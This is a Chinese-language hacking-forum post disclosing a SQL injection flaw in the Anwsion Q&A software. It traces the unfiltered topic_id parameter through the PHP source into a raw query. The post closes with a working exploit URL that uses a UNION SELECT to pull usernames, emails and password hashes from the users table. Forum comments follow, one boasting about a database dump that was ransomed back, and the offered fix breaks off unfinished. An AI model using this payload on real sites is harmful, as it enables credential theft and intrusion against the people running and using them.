Anwsion(v1.1-Beta4) 注入
\app\home\main.php(85):$this->model('question')->get_questions_list \models\question.php(63):get_hot_question \models\question.php(216):最终在get_question_ids_by_topics_ids函数入库 \models\topic.php(693):EXP:
public function explore_action()
{
// 省略........... By.Rices -> Forum: T00ls.Net -> Blog: Rices.so
if ($_GET['category'])
{
if (is_numeric($_GET['category'])) //据说以前这里也可以注射 所以被isnum了..
{
$category_info = $this->model('system')->get_category_info($_GET['category']);
}
/*
省略......
*/
// 注射开始! By.Rices -> Forum: T00ls.Net -> Blog: Rices.so
if (TPL::is_output('block/content_question.tpl.htm', 'home/explore'))
{
if (! $_GET['sort_type'])
{
$_GET['sort_type'] = 'new';
}
if ($_GET['sort_type'] == 'unresponsive')
{
$_GET['answer_count'] = '0';
}
$question_list = $this->model('question')->get_questions_list($_GET['page'], get_setting('contents_per_page'), $_GET['sort_type'], $_GET['topic_id'], $this->user_id, $category_info['id'], $_GET['answer_count'], $_GET['day']);
//$_GET['topic_id']直接带入了 fvck.fvck! By.Rices -> Forum: T00ls.Net -> Blog: Rices.so
TPL::assign('question_list', $question_list);
TPL::assign('question_list_bit', TPL::output('question/ajax/list', false));
// 省略....
public function get_questions_list($page = 1, $pre_page = 10, $sort = 'hot', $topic_id = 0, $uid = null, $category_id = null, $answer_count = null, $day = 30)
{
$uid = intval($uid);
$user_id_list = array();
$user_info_list = array();
$user_list = array();
$question_info_list = array();
$question_list = array();
$limit = calc_page_limit($page, $pre_page);
if ($sort == 'hot')
{
$question_info_list = $this->get_hot_question($category_id, $topic_id, $limit, $day);
//继续带入$topic_id By.Rices -> Forum: T00ls.Net -> Blog: Rices.so
}
//省略...... By.Rices -> Forum: T00ls.Net -> Blog: Rices.so
public function get_hot_question($category_id = 0, $topic_id = null, $limit = '0, 10', $day = 30)
{
$day = intval($day);
if (!$day)
{
$add_time = '0';
}
else if ($day == 1)
{
$add_time = strtotime('-1 day');
}
else
{
$add_time = strtotime('-' . $day . 'day');
}
if ($category_id)
{
$question_all = $this->fetch_all('question', "add_time > " . $add_time . " AND focus_count > 0 AND agree_count > 0 AND answer_count > 0 AND category_id IN(" . implode(',', $this->model('system')->get_category_with_child_ids('question', $category_id)) . ')');
}
else if ($topic_id)// 开始了
{
$topic_ids = array();
if (is_array($topic_id))
{
$topic_ids = $topic_id;
}
else
{
$topic_ids[] = $topic_id;
}
//无任何过滤 又带入了get_question_ids_by_topics_ids函数 By.Rices -> Forum: T00ls.Net -> Blog: Rices.so
if ($question_ids = $this->model('topic')->get_question_ids_by_topics_ids($topic_ids, 10, null, 'question_id DESC'))
{
$question_all = $this->fetch_all('question', "add_time > " . $add_time . " AND question_id IN(" . implode(',', $question_ids) . ')', 'popular_value DESC', $limit);
}
}
else
{
$question_all = $this->fetch_all('question', 'add_time > ' . $add_time, 'popular_value DESC', $limit);
}
return $question_all;
}
function get_question_ids_by_topics_ids($topic_ids, $limit, $where = null, $order = 'update_time DESC')
{
if (!is_array($topic_ids))
{
$topic_id_in = $topic_ids;
}
else
{
$topic_id_in = implode(',', $topic_ids);
}
if ($where)
{
$where = ' AND ' . $where;
}
$_order = explode(' ', $order);
if (!$where AND $_order[0] == 'question_id')
{
$result = $this->query_all("SELECT question_id FROM " . $this->get_table('topic_question') . " WHERE topic_id IN (" . $topic_id_in . ") ORDER BY " . $order, $limit);
// 直接入库执行了, 注射产生~~ By.Rices -> Forum: T00ls.Net -> Blog: Rices.so
}
else
{ //省略....
http://site/?/home/explore/category?sort_type-hot__answer_count-1__day-1__topic_id-55)%20and%201=2%20union%20select%20concat%28(select%20concat(user_name,0x2D3E,email,0x2D3E,password)%20from%20aws_users%20limit%200,1)%29%23
评论15次
急了? 高富帅身份被曝光了吧 啊哈哈哈哈哈哈
晕,数据库有什么东西这么重要一开口就5K小心有诈哦。
一个个的补催牛逼,会死吗
吊 哈哈
肉丝大牛 必须支持~
呵呵,都是大牛、、、
他那垃圾站已经被脱裤了 刚才才给我打了5000过来要回的数据 真是有钱人
这几天土司好像又火了
耶稣的站吧,哈哈
肉丝牛又来送洞了
等会 我也报个。
不错 肉丝大牛威武 下载了一套自己看了下 发现更新了 哈哈不错的官方啊
挖洞的好孩子
支持下 Rices大牛 爆0day
补个临时修复办法 在\app\home\main.php文件 explore_action函数下添加